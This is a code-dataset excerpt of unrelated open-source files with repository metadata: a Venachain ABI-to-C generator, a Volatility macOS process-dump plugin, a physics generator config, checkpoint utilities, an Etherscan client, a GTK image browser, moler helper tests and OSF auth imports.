if abi_item['constant'] != 'true':
func_body_str += ' boat_try(BoatVenachainTxSetNonce(tx_ptr, BOAT_VENACHAIN_NONCE_AUTO));\n\n'
# Initialize List
func_body_str += ' boat_try(RlpInitListObject(&rlp_object_list));\n\n'
# Append Transaction Type
# func_body_str += ' txtype = tx_ptr->rawtx_fields.txtype;\n'
# func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_txtype, UtilityChangeEndian(&txtype, sizeof(txtype)), sizeof(txtype)));\n'
# func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_txtype));\n\n'
# Append Contract Function Name
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_func_name' + ', (BUINT8*)\"' + abi_item['name'] + '\", strlen(\"' + abi_item['name'] + '\")));\n'
func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_string_func_name));\n\n'
# Append arguments
for input in inputs:
if input['type'] == 'string':
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_' + input['name'] + ', (BUINT8*)' + input['name'] + ', strlen(' + input['name'] + ')));\n'
else:
try:
param_size_str = 'sizeof(' + type_mapping[input['type']] + ')'
except:
print(abi_item['name'] + '(): WASM C++ type (' + input['type'] + ') is incompatible with C interface auto generator.')
print('You may have to manually construct the transaction.')
quit(-1)
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_' + input['name'] + ', UtilityChangeEndian(&' + input['name'] + ', ' + param_size_str + ')' + ', ' + param_size_str + '));\n'
func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_string_' + input['name'] + '));\n\n'
# Encode RLP list for function parameters
func_body_str += ' boat_try(RlpEncode(&rlp_object_list, NULL));\n\n'
func_body_str += ' rlp_stream_ptr = RlpGetEncodedStream(&rlp_object_list);\n\n'
if abi_item['constant'] == 'true':
            # for state-less function call
func_body_str += ' call_result_str = BoatVenachainCallContractFunc(tx_ptr, rlp_stream_ptr->stream_ptr, rlp_stream_ptr->stream_len);\n\n'
else:
# for stateful transaction
func_body_str += ' data_field.field_ptr = rlp_stream_ptr->stream_ptr;\n'
func_body_str += ' data_field.field_len = rlp_stream_ptr->stream_len;\n'
func_body_str += ' boat_try(BoatVenachainTxSetData(tx_ptr, &data_field));\n\n'
func_body_str += ' boat_try(BoatVenachainTxSend(tx_ptr));\n\n'
func_body_str += ' UtilityBinToHex(tx_hash_str, tx_ptr->tx_hash.field, tx_ptr->tx_hash.field_len, BIN2HEX_LEFTTRIM_UNFMTDATA, BIN2HEX_PREFIX_0x_YES, BOAT_FALSE);\n\n'
# Cleanup Label
func_body_str += '''
boat_catch(cleanup)
{
RlpRecursiveDeleteObject(&rlp_object_list);
return(NULL);
}
'''
func_body_str += '\n RlpRecursiveDeleteObject(&rlp_object_list);\n'
if abi_item['constant'] == 'true':
func_body_str += ' return(call_result_str);\n'
else:
func_body_str += ' return(tx_hash_str);\n'
func_body_str += '\n}\n\n'
self.c_file_content += func_body_str
def save_c_file(self):
if self.abi_object != None:
c_file_name = self.output_path + '/' + self.abi_file_name.replace('.json','.c')
with open(c_file_name, 'w') as c_file_handle:
c_file_handle.write(self.c_file_content)
h_file_name = self.output_path + '/' + self.abi_file_name.replace('.json','.h')
with open(h_file_name, 'w') as h_file_handle:
h_file_handle.write(self.h_file_content)
def main():
argc = len(sys.argv)
if argc <= 1 or argc >= 4:
print('Usage: ' + sys.argv[0] + ' <ABI File> ' + '[<Output path>]')
else:
if argc == 2:
output_path = './'
else:
output_path = sys.argv[2]
c_func_object = CFunctionGen(sys.argv[1], output_path)
c_func_object.generate_c_funcs()
c_func_object.save_c_file()
if __name__ == '__main__':
main()
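# Example invocation (file and directory names are illustrative):
#     python venachainWASM2c.py my_token.json ./generated
# which writes ./generated/my_token.c and ./generated/my_token.h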
| 39.029304
| 216
| 0.601877
|
22871b4d4f9d9306552c79445eb5455779d3b924
| 3,039
|
py
|
Python
|
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | 2
|
2018-07-16T13:30:40.000Z
|
2018-07-17T12:02:05.000Z
|
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | null | null | null |
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | null | null | null |
# Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import os
import volatility.obj as obj
import volatility.debug as debug
import volatility.plugins.mac.pstasks as mac_tasks
import volatility.plugins.mac.common as mac_common
from volatility.renderers import TreeGrid
from volatility.renderers.basic import Address
class mac_procdump(mac_tasks.mac_tasks):
""" Dumps the executable of a process """
def __init__(self, config, *args, **kwargs):
mac_tasks.mac_tasks.__init__(self, config, *args, **kwargs)
self._config.add_option('DUMP-DIR', short_option = 'D', default = None, help = 'Output directory', action = 'store', type = 'str')
def unified_output(self, data):
if (not self._config.DUMP_DIR or not os.path.isdir(self._config.DUMP_DIR)):
debug.error("Please specify an existing output dir (--dump-dir)")
return TreeGrid([("Task", str),
("Pid", int),
("Address", Address),
("Path", str),
], self.generator(data))
def generator(self, data):
for proc in data:
exe_address = proc.text_start()
if exe_address:
file_path = mac_common.write_macho_file(self._config.DUMP_DIR, proc, exe_address)
yield (0, [
str(proc.p_comm),
int(proc.p_pid),
Address(exe_address),
str(file_path),
])
def render_text(self, outfd, data):
if (not self._config.DUMP_DIR or not os.path.isdir(self._config.DUMP_DIR)):
debug.error("Please specify an existing output dir (--dump-dir)")
self.table_header(outfd, [("Task", "25"),
("Pid", "6"),
("Address", "[addrpad]"),
("Path", "")])
for proc in data:
exe_address = proc.text_start()
if exe_address:
file_path = mac_common.write_macho_file(self._config.DUMP_DIR, proc, exe_address)
self.table_row(outfd, proc.p_comm, proc.p_pid, exe_address, file_path)
| 37.9875
| 138
| 0.60974
|
f75b98564bb5b3dbd67314573125a83ca579baf8
| 1,257
|
py
|
Python
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
generator = cms.EDFilter("Pythia8ConcurrentGeneratorFilter",
pythiaHepMCVerbosity = cms.untracked.bool(False),
maxEventsToPrint = cms.untracked.int32(0),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.), ## fake value
crossSection = cms.untracked.double(1.), ## fake value
comEnergy = cms.double(14000.0), # center of mass energy in GeV
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP5SettingsBlock,
processParameters = cms.vstring(
'HardQCD:all = on',
'PhaseSpace:pTHatMin = 1800.',
'PhaseSpace:pTHatMax = 2400.'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP5Settings',
'processParameters',
)
)
)
| 46.555556
| 89
| 0.546539
|
f25425f8463d4bd369f30c28a48bcd44b881fee0
| 1,270
|
py
|
Python
|
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import time
__author__ = 'Dirk Dittert'
class IllegalOrderException(Exception):
"""
Signals that some of the methods were called in an unexpected order.
"""
pass
class Iteration(object):
def __init__(self, period):
"""
:type period: int
"""
if period <= 0:
raise ValueError("Iteration periond must be >0 but was " + str(period))
self._period = float(period)
self._start_time = None
self._end_time = None
def start_timer(self):
self._start_time = time.time()
def stop_timer(self):
if self._start_time is None:
raise IllegalOrderException("start() must be called before stop()")
self._end_time = time.time()
def _time_to_next_iteration(self):
""" :rtype: float """
if self._start_time is None:
raise IllegalOrderException("start() must be called first.")
if self._end_time is None:
raise IllegalOrderException("end() must be called first.")
duration = self._end_time - self._start_time
return max(self._period - duration, 0.0)
def wait_until_next_iteration(self):
duration = self._time_to_next_iteration()
time.sleep(duration)
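# A minimal usage sketch (illustrative; ``do_probe_work`` is a hypothetical
# workload, not part of this module):
#
#     iteration = Iteration(period=5)
#     while True:
#         iteration.start_timer()
#         do_probe_work()
#         iteration.stop_timer()
#         iteration.wait_until_next_iteration()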
| 27.608696
| 83
| 0.624409
|
d585da7f158e1991f18eef7d2e0ecc34b5b5b3e2
| 4,473
|
py
|
Python
|
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Short utility functions for LEO."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
from six.moves import range
import tensorflow as tf
import config
import data
def unpack_data(problem_instance):
"""Map data.ProblemInstance to a list of Tensors, to process with map_fn."""
if isinstance(problem_instance, data.ProblemInstance):
return list(problem_instance)
return problem_instance
def copy_checkpoint(checkpoint_path, global_step, accuracy):
"""Copies the checkpoint to a separate directory."""
tmp_checkpoint_path = os.path.join(checkpoint_path, "tmp_best_checkpoint")
best_checkpoint_path = os.path.join(checkpoint_path, "best_checkpoint")
if _is_previous_accuracy_better(best_checkpoint_path, accuracy):
tf.logging.info("Not copying the checkpoint: there is a better one from "
"before a preemption.")
return
checkpoint_regex = os.path.join(checkpoint_path,
"model.ckpt-{}.*".format(global_step))
checkpoint_files = tf.gfile.Glob(checkpoint_regex)
graph_file = os.path.join(checkpoint_path, "graph.pbtxt")
checkpoint_files.append(graph_file)
_save_files_in_tmp_directory(tmp_checkpoint_path, checkpoint_files, accuracy)
new_checkpoint_index_file = os.path.join(tmp_checkpoint_path, "checkpoint")
with tf.gfile.Open(new_checkpoint_index_file, "w") as f:
f.write("model_checkpoint_path: \"{}/model.ckpt-{}\"\n".format(
best_checkpoint_path, global_step))
# We first copy the better checkpoint to a temporary directory, and only
# when it's created move it to avoid inconsistent state when job is preempted
# when copying the checkpoint.
if tf.gfile.Exists(best_checkpoint_path):
tf.gfile.DeleteRecursively(best_checkpoint_path)
tf.gfile.Rename(tmp_checkpoint_path, best_checkpoint_path)
tf.logging.info("Copied new best checkpoint with accuracy %.5f", accuracy)
def _save_files_in_tmp_directory(tmp_checkpoint_path, checkpoint_files,
accuracy):
"""Saves the checkpoint files and accuracy in a temporary directory."""
if tf.gfile.Exists(tmp_checkpoint_path):
tf.logging.info("The temporary directory exists, because job was preempted "
"before it managed to move it. We're removing it.")
tf.gfile.DeleteRecursively(tmp_checkpoint_path)
tf.gfile.MkDir(tmp_checkpoint_path)
def dump_in_best_checkpoint_path(obj, filename):
full_path = os.path.join(tmp_checkpoint_path, filename)
with tf.gfile.Open(full_path, "wb") as f:
pickle.dump(obj, f)
for file_ in checkpoint_files:
just_filename = file_.split("/")[-1]
tf.gfile.Copy(
file_,
os.path.join(tmp_checkpoint_path, just_filename),
overwrite=False)
dump_in_best_checkpoint_path(config.get_inner_model_config(), "inner_config")
dump_in_best_checkpoint_path(config.get_outer_model_config(), "outer_config")
dump_in_best_checkpoint_path(accuracy, "accuracy")
def _is_previous_accuracy_better(best_checkpoint_path, accuracy):
if not tf.gfile.Exists(best_checkpoint_path):
return False
previous_accuracy_file = os.path.join(best_checkpoint_path, "accuracy")
with tf.gfile.Open(previous_accuracy_file, "rb") as f:
previous_accuracy = pickle.load(f)
return previous_accuracy > accuracy
def evaluate_and_average(session, tensor, num_estimates):
tensor_value_estimates = [session.run(tensor) for _ in range(num_estimates)]
average_tensor_value = sum(tensor_value_estimates) / num_estimates
return average_tensor_value
def evaluate(session, tensor):
# Single evaluation of the tensor (one pass per class / per component 1-64),
# without averaging over multiple estimates.
tensor_value_estimates = session.run(tensor)
return tensor_value_estimates
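# Usage sketch (an assumption, not from the original file): averaging a noisy
# metric tensor over several evaluations with a TF1-style session; `loss_tensor`
# is a hypothetical tensor built elsewhere.
#
#     with tf.Session() as sess:
#         sess.run(tf.global_variables_initializer())
#         avg_loss = evaluate_and_average(sess, loss_tensor, num_estimates=10)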
| 38.230769 | 80 | 0.743796 |
cf507797237d25b174786b64c02891d0bf287bd8 | 2,312 | py | Python | safe_transaction_service/contracts/clients/etherscan_api.py | peekpi/safe-transaction-service | d75008096e6ee9d87dcb274478777b4984f4b71e | ["MIT"] | 4 | 2021-04-06T02:00:02.000Z | 2022-03-29T17:45:10.000Z | safe_transaction_service/contracts/clients/etherscan_api.py | peekpi/safe-transaction-service | d75008096e6ee9d87dcb274478777b4984f4b71e | ["MIT"] | 5 | 2021-06-09T18:47:49.000Z | 2022-03-12T00:56:46.000Z | safe_transaction_service/contracts/clients/etherscan_api.py | peekpi/safe-transaction-service | d75008096e6ee9d87dcb274478777b4984f4b71e | ["MIT"] | 4 | 2021-04-06T01:58:26.000Z | 2022-01-10T18:14:08.000Z |
import json
import time
from typing import Any, Dict, Optional
from urllib.parse import urljoin
import requests
from gnosis.eth.ethereum_client import EthereumNetwork
class EtherscanApiConfigurationError(Exception):
pass
class RateLimitError(Exception):
pass
class EtherscanApi:
def __init__(self, network: EthereumNetwork, api_key: Optional[str] = None):
self.network = network
self.api_key = api_key
self.base_url = self.get_base_url(network)
if self.base_url is None:
raise EtherscanApiConfigurationError(f'Network {network.name} - {network.value} not supported')
self.http_session = requests.Session()
def build_url(self, path: str):
url = urljoin(self.base_url, path)
if self.api_key:
url += f'&apikey={self.api_key}'
return url
def get_base_url(self, network: EthereumNetwork):
if network == EthereumNetwork.MAINNET:
return 'https://api.etherscan.io'
elif network == EthereumNetwork.RINKEBY:
return 'https://api-rinkeby.etherscan.io'
elif network == EthereumNetwork.XDAI:
return 'https://blockscout.com/poa/xdai'
elif network == EthereumNetwork.ENERGY_WEB_CHAIN:
return 'https://explorer.energyweb.org'
elif network == EthereumNetwork.VOLTA:
return 'https://volta-explorer.energyweb.org'
def _get_contract_abi(self, contract_address: str) -> Optional[Dict[str, Any]]:
url = self.build_url(f'api?module=contract&action=getabi&address={contract_address}')
response = self.http_session.get(url)
if response.ok:
response_json = response.json()
result = response_json['result']
if 'Max rate limit reached, please use API Key for higher rate limit' == result:
raise RateLimitError
if response_json['status'] == '1':
return json.loads(result)
def get_contract_abi(self, contract_address: str, retry: bool = True):
for _ in range(3):
try:
return self._get_contract_abi(contract_address)
except RateLimitError as exc:
if not retry:
raise exc
else:
time.sleep(5)
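# Usage sketch (not part of the original client); the API key and contract
# address below are placeholders.
#
#     api = EtherscanApi(EthereumNetwork.MAINNET, api_key='<YOUR_API_KEY>')
#     abi = api.get_contract_abi('0x...')   # parsed ABI dict/list, or None if not verified
#     # get_contract_abi retries up to 3 times, sleeping 5s when rate limited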
| 34.507463 | 107 | 0.634516 |
0edc082d6980c6cca9aeb6f69acf40ca229a248a | 1,501 | py | Python | browser.py | gentlecolts/booru-browse | ab9821667d56df9b9730d15ffc2be735622a4c91 | ["MIT"] | null | null | null | browser.py | gentlecolts/booru-browse | ab9821667d56df9b9730d15ffc2be735622a4c91 | ["MIT"] | null | null | null | browser.py | gentlecolts/booru-browse | ab9821667d56df9b9730d15ffc2be735622a4c91 | ["MIT"] | null | null | null |
#!/usr/bin/python3
print("Loading resources")
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, Gdk
from mainwin import booruView
#windows console is a pain about unicode
#import os
#if os.name=='nt':
#import sys
#import codecs
#sys.stdout = codecs.getwriter('utf8')(sys.stdout)
#sys.stderr = codecs.getwriter('utf8')(sys.stderr)
print("Browser is starting")
win=Gtk.Window()
win.connect("delete-event", lambda wid, event:Gtk.main_quit())
win.resize(1280, 720)
win.set_title("Booru Browser")
print("window created, adding content")
booruview=booruView()
#key navigation
navblockers=[Gtk.SearchEntry]
def keyfn(w, e):
keyname=Gdk.keyval_name(e.keyval)
#print(e.keyval, keyname)
if type(w.get_focus()) in navblockers:
#print("cant navigate while entry is selected")
return
if keyname=="Right":
booruview.next(1)
elif keyname=="Left":
booruview.next(-1)
booruview.floater.connect('key_press_event', keyfn)
#win.connect('key_press_event', keyfn)
def clickEvent(w, e):
#print(type(w))
#print(dir(e))
win.set_focus(None)
booruview.connect("button-press-event", clickEvent)
def saveimg(group, win, someint, modifier):
booruview.post.content.saveDialog(win)
accel=Gtk.AccelGroup()
accel.connect(Gdk.keyval_from_name('S'), Gdk.ModifierType.CONTROL_MASK, 0, saveimg)
booruview.floater.add_accel_group(accel)
win.add_accel_group(accel)
win.add(booruview)
win.show()
print("content created, starting program")
GObject.threads_init()
Gtk.main()
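# Sketch (not in the original script): another accelerator could be wired up
# the same way as the Ctrl+S save binding above, e.g. Ctrl+Q to quit:
#
#     accel.connect(Gdk.keyval_from_name('Q'), Gdk.ModifierType.CONTROL_MASK,
#                   0, lambda group, win, key, mod: Gtk.main_quit())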
| 22.073529 | 83 | 0.747502 |
83a412ef6de603eb75a040f2cf5e94b815ff55fe | 10,374 | py | Python | test/test_helpers.py | nokia/moler | 13cb3d1329a8904ac074f269b8c9ec1955e3ae30 | ["BSD-3-Clause"] | 57 | 2018-02-20T08:16:47.000Z | 2022-03-28T10:36:57.000Z | test/test_helpers.py | nokia/moler | 13cb3d1329a8904ac074f269b8c9ec1955e3ae30 | ["BSD-3-Clause"] | 377 | 2018-07-19T11:56:27.000Z | 2021-07-09T13:08:12.000Z | test/test_helpers.py | nokia/moler | 13cb3d1329a8904ac074f269b8c9ec1955e3ae30 | ["BSD-3-Clause"] | 24 | 2018-04-14T20:49:40.000Z | 2022-03-29T10:44:26.000Z |
# -*- coding: utf-8 -*-
"""
Tests for helpers functions/classes.
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski'
__copyright__ = 'Copyright (C) 2018-2021, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com'
import mock
import pytest
from moler.exceptions import WrongUsage
def test_instance_id_returns_id_in_hex_form_without_0x():
from moler.helpers import instance_id
from six.moves import builtins
# 0xf0a1 == 61601 decimal
with mock.patch.object(builtins, "id", return_value=61601):
instance = "moler object"
assert "0x" not in instance_id(instance)
assert instance_id(instance) == "f0a1"
def test_converterhelper_k():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
bytes_value, value_in_units, unit = converter.to_bytes("2.5K")
assert 2560 == bytes_value
assert 2.5 == value_in_units
assert 'k' == unit
def test_converterhelper_m():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
bytes_value, value_in_units, unit = converter.to_bytes(".3m", False)
assert 300000 == bytes_value
assert 0.3 == value_in_units
assert 'm' == unit
def test_converterhelper_wrong_unit():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_bytes("3UU", False)
def test_converterhelper_seconds():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
value, value_in_units, unit = converter.to_seconds_str("3m")
assert 180 == value
assert 3 == value_in_units
assert 'm' == unit
def test_converterhelper_number_wrong_format():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_number(value="abc", raise_exception=True)
val = converter.to_number(value="abc", raise_exception=False)
assert val == 0
def test_converterhelper_number():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
val = converter.to_number(value="1")
assert 1 == val
val = converter.to_number(value="0.1")
assert val == 0.1
def test_converterhelper_seconds_ms():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
value = converter.to_seconds(0.408, "ms")
assert pytest.approx(0.000408, 0.000001) == value
def test_converterhelper_seconds_wrong_unit():
from moler.util.converterhelper import ConverterHelper
converter = ConverterHelper.get_converter_helper()
with pytest.raises(ValueError):
converter.to_seconds_str("3UU")
def test_copy_list():
from moler.helpers import copy_list
src = [1]
dst = copy_list(src, deep_copy=True)
assert src == dst
dst[0] = 2
assert src != dst
def test_copy_dict():
from moler.helpers import copy_dict
src = {'a': 1}
dst = copy_dict(src, deep_copy=True)
assert src == dst
dst['a'] = 2
assert src != dst
def test_regex_helper():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
assert regex_helper is not None
match = regex_helper.match(r"\d+(\D+)\d+", "111ABC222")
assert match is not None
assert match == regex_helper.get_match()
assert regex_helper.group(1) == "ABC"
def test_groups_at_regex_helper():
import re
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
if regex_helper.search_compiled(re.compile(r"(\d+)_([A-Z]+)(\w+),(\d+)"), "111_ABCef,222"):
ones, uppers, lowers, twos = regex_helper.groups()
assert ones == '111'
assert uppers == 'ABC'
assert lowers == 'ef'
assert twos == '222'
def test_search_compiled_none():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.search_compiled(None, '123')
assert "search_compiled is None" in str(exc)
def test_match_compiled_none():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.match_compiled(None, '123')
assert "match_compiled is None" in str(exc)
def test_group_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.group(1)
assert "Nothing was matched before calling" in str(exc)
def test_groups_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.groups()
assert "Nothing was matched before calling" in str(exc)
def test_groupdict_without_match_object():
from moler.cmd import RegexHelper
regex_helper = RegexHelper()
with pytest.raises(WrongUsage) as exc:
regex_helper.groupdict()
assert "Nothing was matched before calling" in str(exc)
def test_all_chars_to_hex():
from moler.helpers import all_chars_to_hex
source = "a\n\rb" + chr(3) + chr(5)
expected_output = r"\x61\x0a\x0d\x62\x03\x05"
output = all_chars_to_hex(source=source)
assert output == expected_output
def test_non_printable_chars_to_hex():
from moler.helpers import non_printable_chars_to_hex
source = "a\n\rb" + chr(3) + chr(5)
expected_output = r"a\x0a\x0db\x03\x05"
output = non_printable_chars_to_hex(source=source)
assert output == expected_output
def test_removal_cursor_visibility_codes():
from moler.helpers import remove_cursor_visibility_codes
line = "\x1B[?25h\x1B[?25llogin\x1B[?25l :\x1B[?12h\x1B[?12l"
output = remove_cursor_visibility_codes(multiline=line)
assert "login :" == output
multiline = "\x1B[?25h\x1B[?25llogin\x1B[?25l :\x1B[?12h\x1B[?12l\n\x1B[?25h\x1B[?25l>"
output2 = remove_cursor_visibility_codes(multiline=multiline)
assert "login :\n>" == output2
def test_removal_fill_spaces_right_codes():
from moler.helpers import remove_fill_spaces_right_codes
full_line = "login:\x1B[300X\x1B[24X\x1B[300C\n"
multiline = "login:\x1B[300X\x1B[24X\x1B[300C\n\x1B[300X\x1B[300C\n"
incomplete_line = "login:\x1B[300X\x1B[300C"
output1 = remove_fill_spaces_right_codes(multiline=full_line)
assert "login:\n" == output1
output2 = remove_fill_spaces_right_codes(multiline=multiline)
assert "login:\n\n" == output2
output3 = remove_fill_spaces_right_codes(multiline=incomplete_line)
assert incomplete_line == output3 # no conversion since no newline
def test_removal_left_wrights_that_were_overwritten():
from moler.helpers import remove_overwritten_left_write
line = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[HLast login:"
output = remove_overwritten_left_write(multiline=line)
assert "Last login:" == output
line2 = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H\x1B[32mLast login:"
output2 = remove_overwritten_left_write(multiline=line2)
assert "\x1B[32mLast login:" == output2
line3 = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H login:"
output3 = remove_overwritten_left_write(multiline=line3)
assert " login:" == output3
multiline = "\x1B[300X\x1B[300C\x1B[11;1H\x1B[?25h\x1B[?25l\x1B[H login:\nabc>\x1B[H\x1B[300X\nabc>\x1B[H password:"
output4 = remove_overwritten_left_write(multiline=multiline)
assert " login:\n\x1B[300X\n password:" == output4
def test_removal_text_formating_codes():
from moler.helpers import remove_text_formatting_codes
line = "\x1B[32muser-lab0@PLKR-SC5G-PC11 \x1B[33m~\x1B[m"
output = remove_text_formatting_codes(multiline=line)
assert "user-lab0@PLKR-SC5G-PC11 ~" == output
multiline = "\x1B[32muser-lab0@PLKR-SC5G-PC11 \x1B[33m~\x1B[m$ adb shell\n\x1B[32mmsmnile:/ #\x1B[m"
output2 = remove_text_formatting_codes(multiline=multiline)
assert "user-lab0@PLKR-SC5G-PC11 ~$ adb shell\nmsmnile:/ #" == output2
def test_removal_window_title_codes():
from moler.helpers import remove_window_title_codes
line = "\x1B]0;~\x07"
output = remove_window_title_codes(multiline=line)
assert "" == output
multiline = "\x1B]0;~\x07\n\x1B]2;~\x07"
output2 = remove_window_title_codes(multiline=multiline)
assert "\n" == output2
def test_convert_to_int():
from moler.helpers import convert_to_int, compare_objects
sample_input = {'KEY': [{'KEY1 ': {'contextInfoList': ['sample', '2', '4'],
'someIds': '0'}},
{'KEY2': {'contextInfoList': [],
'num': '20',
'poolId': '1',
'user': {
'contextType': 'sample',
'numContexts': '3',
'num': '4'}}}]}
expected_output = {'KEY': [{'KEY1 ': {'contextInfoList': ['sample', 2, 4],
'someIds': 0}},
{'KEY2': {'contextInfoList': [],
'num': 20,
'poolId': 1,
'user': {
'contextType': 'sample',
'numContexts': 3,
'num': 4}}}]}
assert not compare_objects(convert_to_int(sample_input), expected_output)
def test_convert_to_number_int():
from moler.helpers import convert_to_number
expected = 4
result = convert_to_number("{}".format(expected))
assert expected == result
def test_convert_to_number_float():
from moler.helpers import convert_to_number
expected = 3.2
result = convert_to_number("{}".format(expected))
assert expected == result
def test_convert_to_number_str():
from moler.helpers import convert_to_number
expected = "not a number"
result = convert_to_number(expected)
assert expected == result
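# Sketch of an additional test in the same style (not part of the original
# suite): instance_id() should render any mocked id() value as bare hex.
#
#     def test_instance_id_for_small_id_value():
#         from moler.helpers import instance_id
#         from six.moves import builtins
#         with mock.patch.object(builtins, "id", return_value=255):
#             assert instance_id("moler object") == "ff"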
| 35.649485 | 120 | 0.671486 |
b3488af0beac61aa2a0e00049b3125d922b79367 | 55,790 | py | Python | framework/auth/core.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | ["Apache-2.0"] | null | null | null | framework/auth/core.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | ["Apache-2.0"] | null | null | null | framework/auth/core.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
import datetime as dt
import itertools
import logging
import re
import urlparse
from copy import deepcopy
import bson
import pytz
import itsdangerous
from modularodm import fields, Q
from modularodm.exceptions import NoResultsFound, ValidationError, ValidationValueError, QueryException
from modularodm.validators import URLValidator
import framework
from framework import analytics
from framework.addons import AddonModelMixin
from framework.auth import signals, utils
from framework.auth.exceptions import (ChangePasswordError, ExpiredTokenError, InvalidTokenError,
MergeConfirmedRequiredError, MergeConflictError)
from framework.bcrypt import generate_password_hash, check_password_hash
from framework.exceptions import PermissionsError
from framework.guid.model import GuidStoredObject
from framework.mongo.validators import string_required
from framework.sentry import log_exception
from framework.sessions import session
